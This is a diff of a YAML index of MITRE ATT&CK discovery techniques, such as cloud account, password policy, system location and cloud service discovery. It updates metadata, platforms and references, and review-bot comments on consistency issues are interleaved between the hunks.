x_mitre_data_sources:
- 'File: File Access'
- 'Command: Command Execution'
@@ -50266,6 +50956,10 @@ discovery:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1654
external_id: T1654
+ - source_name: Permiso GUI-Vil 2023
+ description: 'Ian Ahl. (2023, May 22). Unmasking GUI-Vil: Financially Motivated
+ Cloud Threat Actor. Retrieved August 30, 2024.'
+ url: https://permiso.io/blog/s/unmasking-guivil-new-cloud-threat-actor/
- source_name: SIM Swapping and Abuse of the Microsoft Azure Serial Console
description: 'Mandiant Intelligence. (2023, May 16). SIM Swapping and Abuse
of the Microsoft Azure Serial Console: Serial Is Part of a Well Balanced
@@ -50285,56 +50979,11 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1654
atomic_tests: []
T1087.004:
technique:
- x_mitre_platforms:
- - Azure AD
- - Office 365
- - SaaS
- - IaaS
- - Google Workspace
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Praetorian
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--8f104855-e5b7-4077-b1f5-bc3103b41abe
- type: attack-pattern
- created: '2020-02-21T21:08:36.570Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1087.004
- url: https://attack.mitre.org/techniques/T1087/004
- - description: Microsoft. (n.d.). Get-MsolRoleMember. Retrieved October 6, 2019.
- url: https://docs.microsoft.com/en-us/powershell/module/msonline/get-msolrolemember?view=azureadps-1.0
- source_name: Microsoft msolrolemember
- - description: Stringer, M.. (2018, November 21). RainDance. Retrieved October
- 6, 2019.
- url: https://github.com/True-Demon/raindance
- source_name: GitHub Raindance
- - description: Microsoft. (n.d.). az ad user. Retrieved October 6, 2019.
- url: https://docs.microsoft.com/en-us/cli/azure/ad/user?view=azure-cli-latest
- source_name: Microsoft AZ CLI
- - description: Felch, M.. (2018, August 31). Red Teaming Microsoft Part 1 Active
- Directory Leaks via Azure. Retrieved October 6, 2019.
- url: https://www.blackhillsinfosec.com/red-teaming-microsoft-part-1-active-directory-leaks-via-azure/
- source_name: Black Hills Red Teaming MS AD Azure, 2018
- - source_name: AWS List Roles
- description: Amazon. (n.d.). List Roles. Retrieved August 11, 2020.
- url: https://docs.aws.amazon.com/cli/latest/reference/iam/list-roles.html
- - source_name: AWS List Users
- url: https://docs.aws.amazon.com/cli/latest/reference/iam/list-users.html
- description: Amazon. (n.d.). List Users. Retrieved August 11, 2020.
- - source_name: Google Cloud - IAM Servie Accounts List API
- url: https://cloud.google.com/sdk/gcloud/reference/iam/service-accounts/list
- description: Google. (2020, June 23). gcloud iam service-accounts list. Retrieved
- August 4, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-10-15T15:51:18.808Z'
name: Cloud Account
description: "Adversaries may attempt to get a listing of cloud accounts. Cloud
accounts are those created and configured by an organization for use by users,
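Review bot: the platform entries `- Azure AD`, `- Office 365` and `- Google Workspace` are removed from T1087.004 here and nothing in this hunk replaces them; the replacement names `Office Suite` and `Identity Provider` only arrive in the following hunk, and the same rename recurs for T1526 later in the file. Anything that selects techniques by matching these exact platform strings, such as a per-platform index or a platform filter in a test runner, will silently drop this technique for Azure AD, Office 365 and Google Workspace after this change, so grep the generators and consumers for the old names and map them to the new ones in the same change rather than in a follow-up.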
@@ -50356,19 +51005,61 @@ discovery:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: discovery
+ x_mitre_contributors:
+ - Praetorian
+ x_mitre_deprecated: false
x_mitre_detection: |-
Monitor processes, command-line arguments, and logs for actions that could be taken to gather information about cloud accounts, including the use of calls to cloud APIs that perform account discovery.
System and network discovery techniques normally occur throughout an operation as an adversary learns the environment, and also to an extent in normal network operations. Therefore discovery data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.2'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - SaaS
+ - IaaS
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'Command: Command Execution'
- x_mitre_permissions_required:
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--8f104855-e5b7-4077-b1f5-bc3103b41abe
+ created: '2020-02-21T21:08:36.570Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1087/004
+ external_id: T1087.004
+ - source_name: AWS List Roles
+ description: Amazon. (n.d.). List Roles. Retrieved August 11, 2020.
+ url: https://docs.aws.amazon.com/cli/latest/reference/iam/list-roles.html
+ - source_name: AWS List Users
+ description: Amazon. (n.d.). List Users. Retrieved August 11, 2020.
+ url: https://docs.aws.amazon.com/cli/latest/reference/iam/list-users.html
+ - source_name: Black Hills Red Teaming MS AD Azure, 2018
+ description: Felch, M.. (2018, August 31). Red Teaming Microsoft Part 1 Active
+ Directory Leaks via Azure. Retrieved October 6, 2019.
+ url: https://www.blackhillsinfosec.com/red-teaming-microsoft-part-1-active-directory-leaks-via-azure/
+ - source_name: Google Cloud - IAM Servie Accounts List API
+ description: Google. (2020, June 23). gcloud iam service-accounts list. Retrieved
+ August 4, 2020.
+ url: https://cloud.google.com/sdk/gcloud/reference/iam/service-accounts/list
+ - source_name: Microsoft AZ CLI
+ description: Microsoft. (n.d.). az ad user. Retrieved October 6, 2019.
+ url: https://docs.microsoft.com/en-us/cli/azure/ad/user?view=azure-cli-latest
+ - source_name: Microsoft msolrolemember
+ description: Microsoft. (n.d.). Get-MsolRoleMember. Retrieved October 6, 2019.
+ url: https://docs.microsoft.com/en-us/powershell/module/msonline/get-msolrolemember?view=azureadps-1.0
+ - source_name: GitHub Raindance
+ description: Stringer, M.. (2018, November 21). RainDance. Retrieved October
+ 6, 2019.
+ url: https://github.com/True-Demon/raindance
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1057:
technique:
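Review bot: the citation key `source_name: Google Cloud - IAM Servie Accounts List API` carries the `Servie` typo through the reorder. Because `source_name` is what `(Citation: ...)` markers in the description resolve against, correcting it only in this file would break the lookup, so leave it as upstream has it and report it upstream; the same applies to `Securelist Trasparent Tribe 2020` on T1614 further down. On the same object, `x_mitre_permissions_required: - User` is dropped, which is consistent with that field being retired upstream, but check that every object in the file gets the same treatment, since T1614.001 keeps it below.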
@@ -50439,46 +51130,11 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1057
atomic_tests: []
T1497.002:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Deloitte Threat Library Team
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--91541e7e-b969-40c6-bbd8-1b5352ec2938
- type: attack-pattern
- created: '2020-03-06T21:04:12.454Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1497.002
- url: https://attack.mitre.org/techniques/T1497/002
- - source_name: Deloitte Environment Awareness
- url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
- description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
- May 18, 2021.
- - source_name: Sans Virtual Jan 2016
- url: https://www.sans.org/reading-room/whitepapers/forensics/detecting-malware-sandbox-evasion-techniques-36667
- description: Keragala, D. (2016, January 16). Detecting Malware and Sandbox
- Evasion Techniques. Retrieved April 17, 2019.
- - source_name: Unit 42 Sofacy Nov 2018
- url: https://unit42.paloaltonetworks.com/unit42-sofacy-continues-global-attacks-wheels-new-cannon-trojan/
- description: Falcone, R., Lee, B.. (2018, November 20). Sofacy Continues Global
- Attacks and Wheels Out New ‘Cannon’ Trojan. Retrieved April 23, 2019.
- - url: https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html
- description: Carr, N., et al. (2017, April 24). FIN7 Evolution and the Phishing
- LNK. Retrieved April 24, 2017.
- source_name: FireEye FIN7 April 2017
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-09-12T15:50:18.050Z'
name: User Activity Based Checks
description: "Adversaries may employ various user activity checks to detect
and avoid virtualization and analysis environments. This may include changing
@@ -50502,6 +51158,9 @@ discovery:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: discovery
+ x_mitre_contributors:
+ - Deloitte Threat Library Team
+ x_mitre_deprecated: false
x_mitre_detection: 'User activity-based checks will likely occur in the first
steps of an operation but may also occur throughout as an adversary learns
the environment. Data and events should not be viewed in isolation, but as
@@ -50512,9 +51171,14 @@ discovery:
processes being spawned that gather a variety of system information or perform
other forms of Discovery, especially in a short period of time, may aid in
detection. '
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Process: OS API Execution'
- 'Process: Process Creation'
@@ -50524,12 +51188,39 @@ discovery:
- Static File Analysis
- Signature-based detection
- Host forensic analysis
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--91541e7e-b969-40c6-bbd8-1b5352ec2938
+ created: '2020-03-06T21:04:12.454Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1497/002
+ external_id: T1497.002
+ - source_name: FireEye FIN7 April 2017
+ description: Carr, N., et al. (2017, April 24). FIN7 Evolution and the Phishing
+ LNK. Retrieved April 24, 2017.
+ url: https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html
+ - source_name: Unit 42 Sofacy Nov 2018
+ description: Falcone, R., Lee, B.. (2018, November 20). Sofacy Continues Global
+ Attacks and Wheels Out New ‘Cannon’ Trojan. Retrieved April 23, 2019.
+ url: https://unit42.paloaltonetworks.com/unit42-sofacy-continues-global-attacks-wheels-new-cannon-trojan/
+ - source_name: Sans Virtual Jan 2016
+ description: Keragala, D. (2016, January 16). Detecting Malware and Sandbox
+ Evasion Techniques. Retrieved April 17, 2019.
+ url: https://www.sans.org/reading-room/whitepapers/forensics/detecting-malware-sandbox-evasion-techniques-36667
+ - source_name: Deloitte Environment Awareness
+ description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
+ September 13, 2024.
+ url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1069.001:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-07T17:14:42.184Z'
name: 'Permission Groups Discovery: Local Groups'
description: |-
Adversaries may attempt to find local system groups and permission settings. The knowledge of local system permission groups can help adversaries determine which groups exist and which users belong to a particular group. Adversaries may use this information to determine which users have elevated permissions, such as the users found within the local administrators group.
@@ -50572,12 +51263,11 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1069.001
atomic_tests: []
T1201:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2024-10-15T16:02:44.477Z'
name: Password Policy Discovery
description: |-
Adversaries may attempt to access detailed information about the password policy used within an enterprise network or cloud environment. Password policies are a way to enforce complex passwords that are difficult to guess or crack through [Brute Force](https://attack.mitre.org/techniques/T1110). This information may help the adversary to create a list of common passwords and launch dictionary and/or brute force attacks which adheres to the policy (e.g. if the minimum password length should be 8, then not trying passwords such as 'pass123'; not checking for more than 3-4 passwords per account if the lockout is set to 6 as to not lock out accounts).
@@ -50588,28 +51278,31 @@ discovery:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: discovery
+ x_mitre_contributors:
+ - Regina Elwell
+ - Sudhanshu Chauhan, @Sudhanshu_C
+ - Isif Ibrahima, Mandiant
+ - Austin Clark, @c2defense
+ x_mitre_deprecated: false
x_mitre_detection: Monitor logs and processes for tools and command line arguments
that may indicate they're being used for password policy discovery. Correlate
that activity with other suspicious activity from the originating system to
reduce potential false positives from valid user or administrator activity.
Adversaries will likely attempt to find the password policy early in an operation
and the activity is likely to happen with other Discovery activity.
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
x_mitre_platforms:
- Windows
- Linux
- macOS
- IaaS
- Network
- x_mitre_is_subtechnique: false
- x_mitre_deprecated: false
- x_mitre_domains:
- - enterprise-attack
- x_mitre_version: '1.5'
- x_mitre_contributors:
- - Regina Elwell
- - Sudhanshu Chauhan, @Sudhanshu_C
- - Isif Ibrahima, Mandiant
- - Austin Clark, @c2defense
+ - Identity Provider
+ - SaaS
+ - Office Suite
+ x_mitre_version: '1.6'
x_mitre_data_sources:
- 'User Account: User Account Metadata'
- 'Command: Command Execution'
@@ -50642,9 +51335,8 @@ discovery:
url: https://www.us-cert.gov/ncas/alerts/TA18-106A
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1201
atomic_tests: []
T1614.001:
@@ -50687,7 +51379,7 @@ discovery:
description: Ivanov, A. et al. (2018, May 7). SynAck targeted ransomware uses
the Doppelgänging technique. Retrieved May 22, 2018.
url: https://securelist.com/synack-targeted-ransomware-uses-the-doppelganging-technique/85431/
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-15T22:00:56.174Z'
name: 'System Location Discovery: System Language Discovery'
description: "Adversaries may attempt to gather information about the system
language of a victim in order to infer the geographical location of that host.
@@ -50726,13 +51418,11 @@ discovery:
- 'Command: Command Execution'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1614.001
atomic_tests: []
T1012:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-03T18:56:37.011Z'
name: Query Registry
description: |-
Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
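Review bot: for T1614.001 both `- spec_version: '2.1'` and `- x_mitre_attack_spec_version: 2.1.0` are removed and, unlike every other object in this diff, no `x_mitre_attack_spec_version: 3.2.0` is added in their place, so unless the field is emitted elsewhere in the T1614.001 block this is now the one technique here with no ATT&CK spec version at all. It also keeps `x_mitre_permissions_required: - User`, which T1087.004 and T1614 drop in this same change, and its `modified` moved back to `'2021-10-15T22:00:56.174Z'`. All three point to this object not coming from the same upstream snapshot as its siblings; confirm the generator re-fetched it rather than reusing a stale cached copy.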
@@ -50773,87 +51463,85 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1012
atomic_tests: []
T1614:
technique:
- x_mitre_platforms:
- - Windows
- - Linux
- - macOS
- - IaaS
- x_mitre_domains:
- - enterprise-attack
+ modified: '2024-10-15T16:07:23.511Z'
+ name: System Location Discovery
+ description: |2-
+
+ Adversaries may gather information in an attempt to calculate the geographical location of a victim host. Adversaries may use the information from [System Location Discovery](https://attack.mitre.org/techniques/T1614) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
+
+ Adversaries may attempt to infer the location of a system using various system checks, such as time zone, keyboard layout, and/or language settings.(Citation: FBI Ragnar Locker 2020)(Citation: Sophos Geolocation 2016)(Citation: Bleepingcomputer RAT malware 2020) Windows API functions such as GetLocaleInfoW
can also be used to determine the locale of the host.(Citation: FBI Ragnar Locker 2020) In cloud environments, an instance's availability zone may also be discovered by accessing the instance metadata service from the instance.(Citation: AWS Instance Identity Documents)(Citation: Microsoft Azure Instance Metadata 2021)
+
+ Adversaries may also attempt to infer the location of a victim host using IP addressing, such as via online geolocation IP-lookup services.(Citation: Securelist Trasparent Tribe 2020)(Citation: Sophos Geolocation 2016)
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: discovery
x_mitre_contributors:
- Pooja Natarajan, NEC Corporation India
- Hiroki Nagahama, NEC Corporation
- Manikantan Srinivasan, NEC Corporation India
- Wes Hurd
- Katie Nickels, Red Canary
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--c877e33f-1df6-40d6-b1e7-ce70f16f4979
+ x_mitre_deprecated: false
+ x_mitre_detection: |-
+ System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities based on the information obtained.
+
+ Monitor processes and command-line arguments for actions that could be taken to gather system location information. Remote access tools with built-in features may interact directly with the Windows API, such as calling GetLocaleInfoW
to gather information.(Citation: FBI Ragnar Locker 2020)
+
+ Monitor traffic flows to geo-location service provider sites, such as ip-api and ipinfo.
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Windows
+ - Linux
+ - macOS
+ - IaaS
+ x_mitre_version: '1.1'
+ x_mitre_data_sources:
+ - 'Process: Process Creation'
+ - 'Process: OS API Execution'
+ - 'Command: Command Execution'
type: attack-pattern
+ id: attack-pattern--c877e33f-1df6-40d6-b1e7-ce70f16f4979
created: '2021-04-01T16:42:08.735Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1614
url: https://attack.mitre.org/techniques/T1614
- - source_name: FBI Ragnar Locker 2020
- url: https://assets.documentcloud.org/documents/20413525/fbi-flash-indicators-of-compromise-ragnar-locker-ransomware-11192020-bc.pdf
- description: FBI. (2020, November 19). Indicators of Compromise Associated
- with Ragnar Locker Ransomware. Retrieved April 1, 2021.
- - source_name: Sophos Geolocation 2016
- url: https://news.sophos.com/en-us/2016/05/03/location-based-ransomware-threat-research/
- description: 'Wisniewski, C. (2016, May 3). Location-based threats: How cybercriminals
- target you based on where you live. Retrieved April 1, 2021.'
+ external_id: T1614
- source_name: Bleepingcomputer RAT malware 2020
- url: https://www.bleepingcomputer.com/news/security/new-rat-malware-gets-commands-via-discord-has-ransomware-feature/
description: Abrams, L. (2020, October 23). New RAT malware gets commands
via Discord, has ransomware feature. Retrieved April 1, 2021.
+ url: https://www.bleepingcomputer.com/news/security/new-rat-malware-gets-commands-via-discord-has-ransomware-feature/
- source_name: AWS Instance Identity Documents
- url: https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/instance-identity-documents.html
description: Amazon. (n.d.). Instance identity documents. Retrieved April
2, 2021.
- - source_name: Microsoft Azure Instance Metadata 2021
- url: https://docs.microsoft.com/en-us/azure/virtual-machines/windows/instance-metadata-service?tabs=windows
- description: Microsoft. (2021, February 21). Azure Instance Metadata Service
- (Windows). Retrieved April 2, 2021.
+ url: https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/instance-identity-documents.html
- source_name: Securelist Trasparent Tribe 2020
- url: https://securelist.com/transparent-tribe-part-1/98127/
description: 'Dedola, G. (2020, August 20). Transparent Tribe: Evolution analysis,
part 1. Retrieved April 1, 2021.'
- modified: '2022-04-25T14:00:00.188Z'
- name: System Location Discovery
- description: |2-
-
- Adversaries may gather information in an attempt to calculate the geographical location of a victim host. Adversaries may use the information from [System Location Discovery](https://attack.mitre.org/techniques/T1614) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
-
- Adversaries may attempt to infer the location of a system using various system checks, such as time zone, keyboard layout, and/or language settings.(Citation: FBI Ragnar Locker 2020)(Citation: Sophos Geolocation 2016)(Citation: Bleepingcomputer RAT malware 2020) Windows API functions such as GetLocaleInfoW
can also be used to determine the locale of the host.(Citation: FBI Ragnar Locker 2020) In cloud environments, an instance's availability zone may also be discovered by accessing the instance metadata service from the instance.(Citation: AWS Instance Identity Documents)(Citation: Microsoft Azure Instance Metadata 2021)
-
- Adversaries may also attempt to infer the location of a victim host using IP addressing, such as via online geolocation IP-lookup services.(Citation: Securelist Trasparent Tribe 2020)(Citation: Sophos Geolocation 2016)
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: discovery
- x_mitre_detection: |-
- System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities based on the information obtained.
-
- Monitor processes and command-line arguments for actions that could be taken to gather system location information. Remote access tools with built-in features may interact directly with the Windows API, such as calling GetLocaleInfoW
to gather information.(Citation: FBI Ragnar Locker 2020)
-
- Monitor traffic flows to geo-location service provider sites, such as ip-api and ipinfo.
- x_mitre_version: '1.0'
+ url: https://securelist.com/transparent-tribe-part-1/98127/
+ - source_name: FBI Ragnar Locker 2020
+ description: FBI. (2020, November 19). Indicators of Compromise Associated
+ with Ragnar Locker Ransomware. Retrieved September 12, 2024.
+ url: https://s3.documentcloud.org/documents/20413525/fbi-flash-indicators-of-compromise-ragnar-locker-ransomware-11192020-bc.pdf
+ - source_name: Microsoft Azure Instance Metadata 2021
+ description: Microsoft. (2021, February 21). Azure Instance Metadata Service
+ (Windows). Retrieved April 2, 2021.
+ url: https://docs.microsoft.com/en-us/azure/virtual-machines/windows/instance-metadata-service?tabs=windows
+ - source_name: Sophos Geolocation 2016
+ description: 'Wisniewski, C. (2016, May 3). Location-based threats: How cybercriminals
+ target you based on where you live. Retrieved April 1, 2021.'
+ url: https://news.sophos.com/en-us/2016/05/03/location-based-ransomware-threat-research/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- x_mitre_data_sources:
- - 'Process: Process Creation'
- - 'Process: OS API Execution'
- - 'Command: Command Execution'
- x_mitre_permissions_required:
- - User
- x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1614
atomic_tests: []
T1518.001:
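Review bot: the T1614 description and detection text both break mid-sentence after `GetLocaleInfoW`, with `can also be used to determine the locale of the host` and `to gather information` continuing on lines of their own. The break is present in the removed text as well as the added text, so this change only reproduces it, but it is what forces the `|2-` block scalar with the leading blank line, and any renderer of the description will show a newline and a stray leading space in the middle of the sentence. One plausible cause is markup around the API name upstream being stripped into a newline by the generator; check the stripper before assuming the upstream text is at fault, and fix it there rather than in the data. Separately, the FBI Ragnar Locker reference moves from `https://assets.documentcloud.org/...` to `https://s3.documentcloud.org/...` with a new retrieval date; confirm the new host serves the PDF to anonymous readers.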
@@ -50906,17 +51594,16 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1518.001
atomic_tests: []
T1526:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Cloud Service Discovery
description: |-
- An adversary may attempt to enumerate the cloud services running on a system after gaining access. These methods can differ from platform-as-a-service (PaaS), to infrastructure-as-a-service (IaaS), or software-as-a-service (SaaS). Many services exist throughout the various cloud providers and can include Continuous Integration and Continuous Delivery (CI/CD), Lambda Functions, Azure AD, etc. They may also include security services, such as AWS GuardDuty and Microsoft Defender for Cloud, and logging services, such as AWS CloudTrail and Google Cloud Audit Logs.
+ An adversary may attempt to enumerate the cloud services running on a system after gaining access. These methods can differ from platform-as-a-service (PaaS), to infrastructure-as-a-service (IaaS), or software-as-a-service (SaaS). Many services exist throughout the various cloud providers and can include Continuous Integration and Continuous Delivery (CI/CD), Lambda Functions, Entra ID, etc. They may also include security services, such as AWS GuardDuty and Microsoft Defender for Cloud, and logging services, such as AWS CloudTrail and Google Cloud Audit Logs.
- Adversaries may attempt to discover information about the services enabled throughout the environment. Azure tools and APIs, such as the Azure AD Graph API and Azure Resource Manager API, can enumerate resources and services, including applications, management groups, resources and policy definitions, and their relationships that are accessible by an identity.(Citation: Azure - Resource Manager API)(Citation: Azure AD Graph API)
+ Adversaries may attempt to discover information about the services enabled throughout the environment. Azure tools and APIs, such as the Microsoft Graph API and Azure Resource Manager API, can enumerate resources and services, including applications, management groups, resources and policy definitions, and their relationships that are accessible by an identity.(Citation: Azure - Resource Manager API)(Citation: Azure AD Graph API)
For example, Stormspotter is an open source tool for enumerating and constructing a graph for Azure resources and services, and Pacu is an open source AWS exploitation framework that supports several methods for discovering cloud services.(Citation: Azure - Stormspotter)(Citation: GitHub Pacu)
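Review bot: the updated description line now names the Microsoft Graph API but keeps the old citation key `(Citation: Azure AD Graph API)`; that key has to match a `source_name` in this object's `external_references`, so confirm the entry still exists after the sync and, since the text no longer refers to Azure AD Graph, check whether the reference's description and URL should point at Microsoft Graph instead. Leaving the key as-is is safe for rendering, but a citation whose name contradicts the sentence it supports is confusing to readers of the generated docs.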
@@ -50924,10 +51611,12 @@ discovery:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: discovery
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Suzy Schapperle - Microsoft Azure Red Team
- Praetorian
- Thanabodi Phrakhun, I-SECURE
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: |-
Cloud service discovery techniques will likely occur throughout an operation where an adversary is targeting cloud-based systems and services. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities based on the information obtained.
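Review bot: the `x_mitre_attack_spec_version: 3.2.0` added at the top of this object is really a version bump from 3.1.0, because the old value is only removed further down (the `- x_mitre_attack_spec_version: 3.1.0` line in the hunk at the end of T1526); split across two hunks like this, the change reads as an addition rather than an upgrade. If the generator now emits keys in a fixed order, a line in the commit message saying so would let reviewers treat the moves of `x_mitre_attack_spec_version` and `x_mitre_modified_by_ref` as noise and focus on the real changes (the new CISA contributor and the spec version).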
@@ -50936,15 +51625,16 @@ discovery:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- - Azure AD
- - Office 365
- SaaS
- IaaS
- - Google Workspace
- x_mitre_version: '1.3'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Cloud Service: Cloud Service Enumeration'
+ - 'Logon Session: Logon Session Creation'
type: attack-pattern
id: attack-pattern--e24fcba8-2557-4442-a139-1ee2f2e784db
created: '2019-08-30T13:01:10.120Z'
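Review bot: the platform list for T1526 drops `Azure AD`, `Office 365` and `Google Workspace` in favour of `Office Suite` and `Identity Provider` (with the version bump to 1.4 and the new `Logon Session: Logon Session Creation` data source); any downstream consumer that filters techniques by the old platform strings will stop matching this object, so whatever builds platform-scoped views from this file needs the same name mapping applied, or T1526 silently disappears from those views. Worth stating the mapping (Azure AD / Office 365 / Google Workspace to Identity Provider / Office Suite) once in the commit message since it recurs for other techniques in this patch.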
@@ -50972,9 +51662,6 @@ discovery:
url: https://github.com/RhinoSecurityLabs/pacu
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1526
atomic_tests: []
T1018:
@@ -51049,7 +51736,6 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1018
atomic_tests: []
T1046:
@@ -51121,7 +51807,6 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1046
atomic_tests: []
T1518:
@@ -51170,12 +51855,11 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
